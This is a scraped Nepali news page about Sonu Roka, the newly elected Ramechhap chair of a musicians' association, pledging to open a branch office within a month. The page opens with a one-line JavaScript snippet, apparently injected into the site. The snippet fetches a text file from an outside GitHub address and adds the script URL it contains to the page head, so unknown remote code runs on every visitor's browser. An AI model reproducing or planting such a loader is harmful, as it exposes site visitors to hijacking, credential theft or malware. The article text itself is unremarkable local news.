;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा संगीत कर्मी संघको एक महिनामा शाखा कार्यालय खुल्छ-सोनु रोका – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा संगीत कर्मी संघको एक महिनामा शाखा कार्यालय खुल्छ-सोनु रोका
ट्रेन्डिङ

रामेछापमा संगीत कर्मी संघको एक महिनामा शाखा कार्यालय खुल्छ-सोनु रोका

पुष १३,

रामेछाप । संगीत कर्मी संघ नेपाल, शाखा रामेछापका नव नियुक्त अध्यक्ष सोनु रोकाले जिल्लामा शाखा विस्तार भएको एक महिनामा जिल्लामा शाखा कार्यालयको ब्यवस्था गर्ने जिकिर गरेका छन् ।

शनिबार मन्थलीमा कलाकार संघको संगठन विस्तार कार्याक्रमा अध्यक्षमा चयन भएपछि सम्बोधन गर्दै उनले विगतका कार्यासमिति गठन भएपनि काम नभएको आरोप लगाउदै उनले आफू समितिमा परेको एक महिना भित्र जिल्लामा शाखा कार्यालय गठन गरी कलाकारहरुको क्षेत्रमा ब्यापक काम गर्ने आश्वसन दिए ।

उनले भने-विगतमा के भयो ? को-को, के-के, बने, त्यसमा मत्लब भएन हिजो जो-जो, जे-जे भएपनि यहाँ केही काम भएको छैन, साथी हो अब हामीले हाम्रो समिति गठन भएको एक महिनामा शाखा कार्यालय खोल्छौं, काम गर्छौं, कलाकारीता क्षेत्रको विकास, क्षमता अभिवृद्धी, गरिन्छ, क्षमता भएकहरुलाई स्थान दिइन्छ भने ।

चौथौ अधिवेशन सम्पन्न गरि संघको १४ कार्यामिति समेत गठन गरिएको थियो ।

यो पनि पढ्नुहोस्
कलाकारहरुले रमेश प्रसाइको राँगो जस्ता गीत गाउनु पर्यो, माया प्रेमका मात्रै हैन- संसद पौडेल
राष्ट्रिय संगीतकर्मी संघको चौथो अधिवेशन रामेछापमा सम्पन्न

फेसबुक प्रतिक्रियाहरु